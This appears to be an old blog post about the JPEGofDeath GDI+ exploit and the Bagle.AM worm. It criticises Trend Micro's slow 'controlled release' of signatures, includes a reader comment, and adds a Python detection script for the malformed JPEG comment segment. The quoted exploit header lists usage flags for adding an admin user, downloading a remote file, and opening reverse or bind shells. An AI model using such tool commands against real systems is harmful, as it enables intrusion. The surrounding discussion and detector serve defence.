JPEGofDeath and the Bagle variant (AM) – Trend Antivirus worries

From K-Otik — not sure if a compiled copy is floating around the ‘Net:

* Exploit Name:
* =============
* JpegOfDeath.M.c v0.6.a All in one Bind/Reverse/Admin/FileDownload
* =============
* Tweaked Exploit By M4Z3R For GSO
* All Credits & Greetings Go To:
* ==========
* FoToZ, Nick DeBaggis, MicroSoft, Anthony Rocha, #romhack
* Peter Winter-Smith, IsolationX, YpCat, Aria Giovanni,
* Nick Fitzgerald, Adam Nance (where are you?),
* Santa Barbara, Jenna Jameson, John Kerry, so1o,
* Computer Security Industry, Rom Hackers, My chihuahuas
* (Rocky, Sailor, and Penny)…
* ===========
* Flags Usage:
* -a: Add User X with Pass X to Admin Group;
* IE: Exploit.exe -a pic.jpg
* -d: Download a File From an HTTP Server;
* IE: Exploit.exe -d http://YourWebServer/Patch.exe pic.jpg
* -r: Send Back a Shell To a Specified IP on a Specific Port;
* IE: Exploit.exe -r -p 123 pic.jpg (Default Port is 1337)
* -b: Bind a Shell on The Exploited Machine On a Specific Port;
* IE: Exploit.exe -b -p 132 pic.jpg (Default Port is 1337)

Already the worm we saw enter our network yesterday, due to Trend Micro’s slow virus signature release time, included going out to a website to fetch a ws.jpg. The worm (W32/ or WORM_BAGLE.AM, depending who you talk to) got in while the virus signature was still in “controlled” release, which means you have to download it manually rather than getting it automatically. Norton does the same thing, but the delay is a killer. Suddenly you have to break with normal procedures to maintain up-to-the-minute protection. At 5 pm Trend was still ranking this worm as low risk with no in-the-wild distribution — how wrong they were. NAI was much further ahead of the game than Trend this time.

As for the exploit, it still looks like a means to an end: a beachhead exploit, a way into your network, not a worm-able product by itself. Plus, why would you need this exploit when you still have ID10T users who open things like price.exe or joke.exe in an e-mail?
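As an added defensive example (not the exploit quoted above and not from the original post): the GDI+ bug behind JPEGofDeath, MS04-028, is a JPEG COM segment whose 16-bit length field is below 2, a detail the post does not spell out. The scanner below walks a file's marker segments and flags that pattern on constructed sample bytes, the kind of check a mail or web gateway could apply to a fetched ws.jpg before a vulnerable viewer ever parses it.

```python
import struct

# MS04-028 ("JPEG of Death"): GDI+ trusted the 16-bit length of a COM
# (0xFFFE) segment. The length includes its own two bytes, so a value
# below 2 underflows the payload size and corrupts the heap. This is a
# detection-only marker walk (added example, not the quoted exploit).

EOI, SOS, COM = 0xD9, 0xDA, 0xFE
STANDALONE = {0x01, *range(0xD0, 0xD8)}   # TEM and RSTn carry no length


def scan_jpeg(data: bytes) -> list:
    """Return findings for malformed header segments; [] means clean."""
    findings = []
    if data[:2] != b"\xff\xd8":
        return ["not a JPEG (missing SOI)"]
    pos = 2
    while pos + 1 < len(data):
        if data[pos] != 0xFF:
            findings.append(f"expected marker at offset {pos}")
            break
        marker = data[pos + 1]
        if marker == 0xFF:                # fill byte between markers
            pos += 1
            continue
        pos += 2
        if marker == EOI or marker == SOS:  # end of header segments
            break
        if marker in STANDALONE:
            continue
        if pos + 2 > len(data):
            findings.append(f"truncated length field at offset {pos}")
            break
        length = struct.unpack(">H", data[pos:pos + 2])[0]
        if length < 2:
            kind = "MS04-028 COM pattern" if marker == COM else "malformed"
            findings.append(f"marker 0x{marker:02X} at offset {pos - 2} "
                            f"declares length {length} (< 2, {kind})")
            break
        pos += length                     # jump over the segment payload
    return findings


# Constructed samples, not real files: a well-formed header with a
# 5-byte comment, and one whose COM length field is 0x0001.
GOOD = b"\xff\xd8" + b"\xff\xfe" + struct.pack(">H", 7) + b"hello" + b"\xff\xd9"
BAD = b"\xff\xd8" + b"\xff\xfe" + b"\x00\x01" + b"A" * 16 + b"\xff\xd9"

if __name__ == "__main__":
    for name, blob in (("GOOD", GOOD), ("BAD", BAD)):
        print(name, scan_jpeg(blob) or "clean")
```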



  • Darwin

    Yes, I agree, that Controlled Release is very annoying. We had a couple of infections due to that… Strange concept. Also, they need to make the deployment of controlled releases easier and common among their products… Trend ServerProtect and/or OfficeScan control servers.